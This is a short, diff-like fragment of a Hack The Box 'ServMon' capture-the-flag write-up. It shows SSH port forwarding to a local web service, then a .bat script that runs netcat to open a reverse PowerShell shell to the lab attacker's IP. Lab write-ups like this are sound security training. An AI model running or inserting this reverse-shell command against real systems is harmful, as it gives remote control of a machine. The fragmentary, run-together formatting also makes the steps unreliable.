ServMon HTB Writeup

 `-L 8443:127.0.0.1:8443`.
 And then go to my browser and access the website with `https://localhost:8443`

-I now create a .bat script
+I now create a .bat script@echo off

 C:\Temp\nc.exe 10.10.14.52 9854 -e powershell